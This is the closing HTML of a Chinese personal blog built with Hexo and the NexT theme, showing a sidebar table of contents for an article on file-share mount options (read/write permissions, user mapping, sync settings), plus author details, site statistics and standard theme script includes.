href="#%F0%9F%A7%A9-%E5%B8%B8%E7%94%A8%E9%80%89%E9%A1%B9%E8%AF%B4%E6%98%8E%EF%BC%88%E6%8B%AC%E5%8F%B7%E5%86%85%E7%9A%84%E9%83%A8%E5%88%86%EF%BC%89"><span class="nav-number">1.8.0.2.</span> <span class="nav-text">🧩 常用选项说明（括号内的部分）</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%F0%9F%93%96-%E8%AF%BB%E5%86%99%E6%9D%83%E9%99%90%E6%8E%A7%E5%88%B6"><span class="nav-number">1.8.0.2.1.</span> <span class="nav-text">📖 读写权限控制</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%F0%9F%A7%8D-%E7%94%A8%E6%88%B7%E6%9D%83%E9%99%90%E6%98%A0%E5%B0%84%EF%BC%88%E8%BA%AB%E4%BB%BD%E6%98%A0%E5%B0%84%EF%BC%89"><span class="nav-number">1.8.0.2.2.</span> <span class="nav-text">🧍 用户权限映射（身份映射）</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%F0%9F%92%BE-%E5%90%8C%E6%AD%A5%E4%B8%8E%E6%80%A7%E8%83%BD%E9%80%89%E9%A1%B9"><span class="nav-number">1.8.0.2.3.</span> <span class="nav-text">💾 同步与性能选项</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%F0%9F%93%81-%E5%AD%90%E7%9B%AE%E5%BD%95%E6%A3%80%E6%9F%A5"><span class="nav-number">1.8.0.2.4.</span> <span class="nav-text">📁 子目录检查</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%F0%9F%92%A1-%E5%85%B6%E4%BB%96%E9%AB%98%E7%BA%A7%E9%80%89%E9%A1%B9%EF%BC%88%E5%8F%AF%E9%80%89%EF%BC%89"><span class="nav-number">1.8.0.2.5.</span> <span class="nav-text">💡 其他高级选项（可选）</span></a></li></ol></li></ol></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">作者：陈展</p>
  <div class="site-description" itemprop="description">欢迎到访</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives">
          <span class="site-state-item-count">7</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">作者：陈展</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
